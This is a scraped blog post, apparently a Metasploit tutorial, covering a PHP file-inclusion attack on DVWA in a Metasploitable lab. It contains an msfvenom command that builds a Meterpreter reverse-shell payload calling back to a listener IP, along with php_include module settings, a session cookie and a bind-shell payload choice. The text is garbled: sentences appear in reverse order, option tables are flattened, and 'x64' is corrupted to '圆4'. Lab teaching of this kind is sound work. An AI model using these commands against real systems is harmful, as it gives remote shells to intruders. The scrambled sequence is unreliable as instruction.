![]() No arch selected, selecting arch: 圆4 from the payload No platform was selected, choosing Msf::Module::Platform::Windows from the payload Just like that, a whole new avenue of attack is opened up using Metasploit.1 Create Shell msfvenom -p windows/圆4/meterpreter/reverse_tcp LHOST=192.168.178.16 LPORT=443 -f psh -o meterpreter-64.ps1 msf exploit( php_include) > set PAYLOAD php/meterpreter/bind_tcp In order to further show off the versatility of Metasploit, we will use the PHP Meterpreter payload. ![]() HEADERS => Cookie:security=low PHPSESSID=dac6577a6c8017bab048dfbc92de6d92 Msf exploit( php_include) > set HEADERS "Cookie:security=low PHPSESSID=dac6577a6c8017bab048dfbc92de6d92" Msf exploit( php_include) > set PATH /dvwa/vulnerabilities/fi/ msf exploit( php_include) > set PHPURI /?page=XXpathXX Where we would normally provide the URL to our PHP shell, we simply need to place the text XXpathXX and Metasploit will know to attack this particular point on the site. The most critical option to set in this particular module is the exact path to the vulnerable inclusion point. URIPATH no The URI to use for this exploit (default is random) SSLCert no Path to a custom SSL certificate (default is randomly generated) SSL false no Negotiate SSL/TLS for outgoing connections SRVPORT 8080 yes The local port to listen on. This must be an address on the local machine or 0.0.0.0 SRVHOST 0.0.0.0 yes The local host to listen on. Proxies no A proxy chain of format type:host:port POSTDATA no The POST data to send, with the include parameter changed to XXpathXX PHPURI no The URI to request, with the include parameter changed to XXpathXX PHPRFIDB /usr/share/metasploit-framework/data/exploits/php/rfi-locations.dat no A local file containing a list of URLs to try, with XXpathXX replacing the URL PATH / yes The base directory to prepend to the URL to try HEADERS no Any additional HTTP headers to send, cookies for example. Name Current Setting Required Description Module options (exploit/unix/webapp/php_include): msf > use exploit/unix/webapp/php_include Loading the module in metasploit, we can see a great number of options available to us. Copy the value of PHPSESSID, and make sure that ‘security’ is set to ‘low’. Once logged into DVWA, go to tools -> Cookie Manager+ and find the entry for the victim IP-address. Download and install Cookies Manager+ and restart your browser. In Iceweasel, browse to about:addons and search for ‘cookies manager+’. To obtain the cookie information, we will use an Iceweasel add-on called Cookies Manager+. Specifically, we will need the PHP session ID of a logged on session, as well as DVWA’s security setting. For this particular application, we will need some cookie information from the web page. We’ll be using the Damn Vulnerable Web Application (DVWA) on metasploitable. ![]() ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |